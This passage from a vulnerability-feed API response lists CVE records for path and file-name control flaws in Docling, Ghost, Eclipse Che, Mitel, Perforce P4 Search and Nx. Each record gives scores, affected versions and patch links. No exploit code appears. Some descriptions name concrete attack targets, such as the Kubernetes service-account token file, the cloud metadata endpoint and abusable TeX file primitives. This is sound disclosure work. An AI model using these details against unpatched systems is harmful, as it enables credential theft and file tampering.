exists. Direct untrusted loading through docling-core is outside this Docling fix. This issue is fixed in 2.131.0.","cveId":"CVE-2026-105748","cvssScore":4.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","severity":"medium","vendor":"docling","product":"docling","affectedVersions":[">= 2.16.0, < 2.131.0","pkg:pypi/docling >= 2.16.0, < 2.131.0","pkg:pypi/docling-slim >= 2.92.0, < 2.131.0"],"cwes":["CWE-73","CWE-200"],"tags":["nvd","status:received","status:undergoing-analysis","status:analyzed","osv","osv:ghsa-p944-4xh2-x776","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/docling-project/docling/commit/d4bb776884aba9aa3132f54773f420853cf7afe4","https://github.com/docling-project/docling/pull/4417","https://github.com/docling-project/docling/security/advisories/GHSA-p944-4xh2-x776"],"references":[{"url":"https://github.com/docling-project/docling/commit/d4bb776884aba9aa3132f54773f420853cf7afe4","type":"other","title":"OSV web"},{"url":"https://github.com/docling-project/docling/pull/4417","type":"other","title":"OSV web"},{"url":"https://github.com/docling-project/docling/releases/tag/v2.131.0","type":"other","title":"OSV web"},{"url":"https://github.com/docling-project/docling/security/advisories/GHSA-p944-4xh2-x776","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-p944-4xh2-x776","type":"advisory","title":"OSV GHSA-p944-4xh2-x776"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105748","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/docling-project/docling","type":"vendor","title":"OSV package"}],"epssScore":0.00222,"epssPercentile":0.11666,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T22:16:57.793Z","addedAt":"2026-10-05T23:50:40.406Z","updatedAt":"2026-10-08T00:42:49.563Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105748","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105748","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-P944-4XH2-X776"}]},{"id":"696af58e-47dc-4110-b752-5616f72a4f77","slug":"cve-2026-105744","externalId":"CVE-2026-105744","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105744 — Docling simplifies document processing by parsing diverse formats and providing integrations with the generative AI ecosystem.","description":"Docling simplifies document processing by parsing diverse formats and providing integrations with the generative AI ecosystem. From 2.94.0 until 2.132.0, callers that opt into LatexBackendOptions(tikz_engine=\"tectonic\") invoke docling/backend/latex/engines/tectonic.py to compile an untrusted TikZ body and document preamble without restricting TeX file primitives including \\openin and \\openout. Crafted input can read files available to the converter and create or overwrite writable files, and enabling the tikz_engine_allow_shell_escape option additionally permits shell commands through TeX. The default configuration, which does not enable Tectonic rendering, is not affected. This vulnerability is fixed in 2.132.0.","cveId":"CVE-2026-105744","cvssScore":8.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":"docling","product":"docling","affectedVersions":[">= 2.94.0, < 2.132.0","pkg:pypi/docling >= 2.94.0, < 2.132.0","pkg:pypi/docling-slim >= 2.94.0, < 2.132.0"],"cwes":["CWE-22","CWE-73","CWE-1188"],"tags":["nvd","status:received","status:undergoing-analysis","status:analyzed","osv","osv:ghsa-x3q2-h9hx-4r4j","ecosystem:pypi","osv:pysec-2026-4191"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/docling-project/docling/commit/38b6fa0a465d46fdacbbec333f50fa19c4f6b342","https://github.com/docling-project/docling/pull/4419","https://github.com/docling-project/docling/security/advisories/GHSA-x3q2-h9hx-4r4j"],"references":[{"url":"https://github.com/docling-project/docling/commit/38b6fa0a465d46fdacbbec333f50fa19c4f6b342","type":"patch","title":"OSV fix"},{"url":"https://github.com/docling-project/docling/pull/4419","type":"patch","title":"OSV fix"},{"url":"https://github.com/docling-project/docling/releases/tag/v2.132.0","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/docling-project/docling/security/advisories/GHSA-x3q2-h9hx-4r4j","type":"patch","title":"OSV fix"},{"url":"https://osv.dev/vulnerability/GHSA-x3q2-h9hx-4r4j","type":"advisory","title":"OSV GHSA-x3q2-h9hx-4r4j"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105744","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/docling-project/docling","type":"vendor","title":"OSV package"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-4191","type":"advisory","title":"OSV PYSEC-2026-4191"}],"epssScore":0.00344,"epssPercentile":0.25873,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T22:16:57.177Z","addedAt":"2026-10-05T23:50:40.372Z","updatedAt":"2026-10-08T12:42:40.390Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105744","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105744","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-X3Q2-H9HX-4R4J"}]},{"id":"31fd17a0-ab91-4c24-af22-465af0c921f6","slug":"cve-2026-105676","externalId":"CVE-2026-105676","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105676 — Ghost is a Node.js content management system.","description":"Ghost is a Node.js content management system. From 1.20.0 until 6.64.0, a vulnerability in how Ghost loads theme translation files allowed an authenticated Administrator to read JSON files outside of the active theme's directory, potentially exposing server configuration secrets. This issue is fixed in version 6.64.0.","cveId":"CVE-2026-105676","cvssScore":4.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/TryGhost/Ghost/commit/d2f498694be549074dd5817fd0e8a1371b65df02","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/TryGhost/Ghost/issues/30635","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/TryGhost/Ghost/releases/tag/v6.64.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/TryGhost/Ghost/security/advisories/GHSA-m382-6jw4-fmp6","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00403,"epssPercentile":0.32393,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T20:17:14.547Z","addedAt":"2026-10-05T21:50:40.966Z","updatedAt":"2026-10-06T15:50:58.464Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105676","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105676","note":"authoritative record"}]},{"id":"272d22e9-6e9a-4d38-afc6-d6f99ee5b1af","slug":"cve-2026-86671","externalId":"CVE-2026-86671","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-86671 — In Eclipse Che versions 7.29.0 and later, the GET `/api/scm/resolve` and `POST /api/factory/resolver` endpoints pass an attacker-controlled URL to …","description":"In Eclipse Che versions 7.29.0 and later, the GET `/api/scm/resolve` and `POST /api/factory/resolver` endpoints pass an attacker-controlled URL to `URLFetcher.fetch()`, which calls `new URL(url).openConnection()` with no scheme or host allow-list and returns the response body to the caller. Any authenticated Che user can read arbitrary local files via the file:// scheme (including the pod's Kubernetes service-account token at `file:///var/run/secrets/kubernetes.io/serviceaccount/token`), reach internal HTTP services and cloud instance metadata endpoints (169.254.169.254), and have their stored SCM personal access token attached as an `Authorization` header to a host of their choosing. The same credential-forwarding behavior also fires when a victim opens a workspace from a malicious devfile whose `parent.uri` points to an attacker-controlled server, enabling exfiltration of the victim's SCM PAT without direct API access. No fix is available.","cveId":"CVE-2026-86671","cvssScore":8.4,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73","CWE-522","CWE-918"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://gitlab.eclipse.org/security/cve-assignment/-/work_items/278","type":"advisory","title":"emo@eclipse.org"},{"url":"https://gitlab.eclipse.org/security/vulnerability-reports/-/work_items/620","type":"advisory","title":"emo@eclipse.org"},{"url":"https://redhat.atlassian.net/browse/CRW-11956","type":"advisory","title":"emo@eclipse.org"}],"epssScore":0.00252,"epssPercentile":0.15252,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T17:17:16.910Z","addedAt":"2026-10-05T17:50:43.082Z","updatedAt":"2026-10-06T15:50:57.853Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86671","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-86671","note":"authoritative record"}]},{"id":"421ecc28-84d1-42c9-95d5-11059c8bdf33","slug":"cve-2026-104809","externalId":"CVE-2026-104809","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104809 — DigitalCanion has discovered a vulnerability that allows an attacker to cause the system to load an attacker-controlled .so file instead of the exp…","description":"DigitalCanion has discovered a vulnerability that allows an attacker to cause the system to load an attacker-controlled .so file instead of the expected legitimate module. The loading mechanism relies on a predictable module name without adequately verifying the file’s origin or integrity. A malicious shared object using the expected name can therefore be loaded by a privileged process. The module code then executes within the context and privileges of that process. This results in arbitrary code execution and full compromise of the Mitel Linux virtual machine.","cveId":"CVE-2026-104809","cvssScore":8.4,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:Amber","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73","CWE-426","CWE-427","CWE-494","CWE-829"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://digitalcanion.com/en/security-research/#vendor=mitel&status=cna","type":"advisory","title":"vulnerability@ncsc.ch"}],"epssScore":0.00087,"epssPercentile":0.00329,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T09:17:10.007Z","addedAt":"2026-10-05T09:50:40.896Z","updatedAt":"2026-10-06T15:50:57.446Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104809","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104809","note":"authoritative record"}]},{"id":"500ef032-71f3-412c-b17d-6f15079476fb","slug":"cve-2026-104805","externalId":"CVE-2026-104805","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104805 — DigitalCanion has discovered a vulnerability in the backup restoration functionality that allows an attacker with access to the configured backup r…","description":"DigitalCanion has discovered a vulnerability in the backup restoration functionality that allows an attacker with access to the configured backup repository to introduce arbitrary files into the system during restoration.\n\n\n\n\nThe specific flaw exists within the backup restoration mechanism, which fails to properly validate the paths, file types, integrity, and authenticity of files contained within a restored TGZ archive. The application does not perform file-signature verification before extracting the archive, allowing a specially crafted backup to contain attacker-controlled files.\n\n\n\n\nAn attacker with access to the backup SFTP or other configured repository can therefore provide a malicious TGZ archive that, when restored by the system, may place arbitrary files on the underlying Linux system. Depending on the location and permissions of the extracted files, this behavior can potentially be leveraged to achieve arbitrary code execution with root privileges and compromise the underlying virtual machine.\n\n\n\n\nThe absence of enforced backup passwords further reduces the protection provided by the backup mechanism and may facilitate unauthorized access to the repository.","cveId":"CVE-2026-104805","cvssScore":8.5,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Amber","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-22","CWE-73","CWE-345","CWE-434","CWE-494"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://digitalcanion.com/en/security-research/#vendor=mitel&status=cna","type":"advisory","title":"vulnerability@ncsc.ch"}],"epssScore":0.00216,"epssPercentile":0.11029,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T09:17:09.380Z","addedAt":"2026-10-05T09:50:40.871Z","updatedAt":"2026-10-06T15:50:57.422Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104805","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104805","note":"authoritative record"}]},{"id":"e0de0d45-fb37-4318-b7df-868a96c96b65","slug":"cve-2026-103511","externalId":"CVE-2026-103511","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-103511 — Perforce P4 Search prior to 2026.4.2 does not validate file names supplied to its extension installation feature.","description":"Perforce P4 Search prior to 2026.4.2 does not validate file names supplied to its extension installation feature. An attacker with super-user or service-token privileges can write files with arbitrary content to the P4 Search installation directory.","cveId":"CVE-2026-103511","cvssScore":5.1,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://portal.perforce.com/s/cve/a91Qi000003FDpdIAG/arbitrary-filewrite-via-extension-installation-in-p4search","type":"advisory","title":"security@puppet.com"}],"epssScore":0.00328,"epssPercentile":0.23823,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T09:17:07.113Z","addedAt":"2026-10-05T09:50:40.769Z","updatedAt":"2026-10-06T15:50:57.300Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-103511","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-103511","note":"authoritative record"}]},{"id":"a2f4e1c6-c4eb-45cc-8097-2742f3f5d479","slug":"cve-2026-103507","externalId":"CVE-2026-103507","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-103507 — Perforce P4 Search prior to 2026.4.2 does not restrict file paths written through its logging configuration interface.","description":"Perforce P4 Search prior to 2026.4.2 does not restrict file paths written through its logging configuration interface. An attacker holding the service authentication token can write arbitrary files on the host, potentially leading to code execution as the P4 Search service account.","cveId":"CVE-2026-103507","cvssScore":7.5,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://portal.perforce.com/s/cve/a91Qi000003FE49IAG/arbitrary-filewrite-via-log-configuration-path-in-p4search","type":"advisory","title":"security@puppet.com"}],"epssScore":0.00513,"epssPercentile":0.41865,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T09:17:06.843Z","addedAt":"2026-10-05T09:50:40.753Z","updatedAt":"2026-10-06T15:50:57.290Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-103507","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-103507","note":"authoritative record"}]},{"id":"dbfb8755-f8d3-4704-a7d4-a6cf902d639c","slug":"cve-2026-104853","externalId":"CVE-2026-104853","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104853 — Nx is a monorepo solution for TypeScript and polyglot codebases.","description":"Nx is a monorepo solution for TypeScript and polyglot codebases. From 13.10.0 until 22.7.10 and 23.2.1, Nx migration planning reads the nx-migrations.migrations value from a target package manifest without validating that it is a contained relative path. A hostile direct dependency or a package introduced through a trusted package's packageGroup can supply .. segments or an absolute path, causing nx migrate to join an escaping destination onto its temporary directory. The migration archive can then write attacker-controlled bytes outside the temporary directory, while opening the destination stream can truncate an existing writable file even when no archive entry matches. This occurs during migration planning before review of the migration list or use of --run-migrations; the vulnerable installed Nx copy is reached when the normal nx@latest handoff is bypassed with NX_USE_LOCAL, NX_MIGRATE_USE_LOCAL, NX_MIGRATE_CLI_VERSION, --run-id, or fallback after a temporary-install failure. This issue is fixed in versions 22.7.10 and 23.2.1.","cveId":"CVE-2026-104853","cvssScore":5.8,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"npm","product":"nx","affectedVersions":["pkg:npm/nx >= 13.10.0, < 22.7.10","pkg:npm/nx >= 23.0.0, < 23.2.1"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-hrvq-x7jp-36xv","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/nrwl/nx/commit/38cd82a0c05e8212e538bdb87ccb198d6504e58f","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/commit/95474ab457e8e1dbdbefad29040c166105a8fb90","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/commit/de37c5ebd1852fac700d70726326236ac398af3f","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/pull/36887","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/releases/tag/22.7.10","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/releases/tag/23.2.1","type":"other","title":"OSV web"},{"url":"https://github.com/nrwl/nx/security/advisories/GHSA-hrvq-x7jp-36xv","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-hrvq-x7jp-36xv","type":"advisory","title":"OSV GHSA-hrvq-x7jp-36xv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104853","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/nrwl/nx","type":"vendor","title":"OSV package"}],"epssScore":0.00174,"epssPercentile":0.06257,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-02T17:17:03.920Z","addedAt":"2026-10-02T17:50:40.845Z","updatedAt":"2026-10-06T01:54:26.997Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104853","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104853","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-HRVQ-X7JP-36XV"}]},{"id":"28328773-2c08-4e12-b6c9-304f3fade2c8","slug":"cve-2026-104417","externalId":"CVE-2026-104417","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-104417 — Ghost from 1.20.0 before 6.64.0 contains a path traversal vulnerability in theme translation file loading that allows authenticated administrators …","description":"Ghost from 1.20.0 before 6.64.0 contains a path traversal vulnerability in theme translation file loading that allows authenticated administrators to read JSON files outside the active theme directory. Attackers can manipulate the locale setting to load JSON files elsewhere on the server, exposing server configuration secrets.","cveId":"CVE-2026-104417","cvssScore":6.9,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"npm","product":"ghost","affectedVersions":["pkg:npm/ghost >= 1.20.0, < 6.64.0"],"cwes":["CWE-22","CWE-73"],"tags":["nvd","status:received","status:deferred","osv","osv:ghsa-m382-6jw4-fmp6","ecosystem:npm"],"relatedCves":["CVE-2026-105676"],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/TryGhost/Ghost/security/advisories/GHSA-m382-6jw4-fmp6","type":"other","title":"OSV web"},{"url":"https://www.vulncheck.com/advisories/ghost-1.20.0-before-6.64.0-path-traversal-via-locale-setting","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://osv.dev/vulnerability/GHSA-m382-6jw4-fmp6","type":"advisory","title":"OSV GHSA-m382-6jw4-fmp6"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105676","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/TryGhost/Ghost/issues/30635","type":"other","title":"OSV web"},{"url":"https://github.com/TryGhost/Ghost/pull/30635","type":"other","title":"OSV web"},{"url":"https://github.com/TryGhost/Ghost/commit/d2f498694be549074dd5817fd0e8a1371b65df02","type":"other","title":"OSV web"},{"url":"https://github.com/TryGhost/Ghost","type":"vendor","title":"OSV package"},{"url":"https://github.com/TryGhost/Ghost/releases/tag/v6.64.0","type":"other","title":"OSV web"}],"epssScore":0.00366,"epssPercentile":0.2833,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-02T12:17:11.567Z","addedAt":"2026-10-02T13:50:40.419Z","updatedAt":"2026-10-08T00:42:49.915Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-104417","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-104417","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-M382-6JW4-FMP6"}]}],"pagination":{"page":1,"limit":20,"total":325,"totalPages":17,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:43:35.087Z","durationMs":26,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-73"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}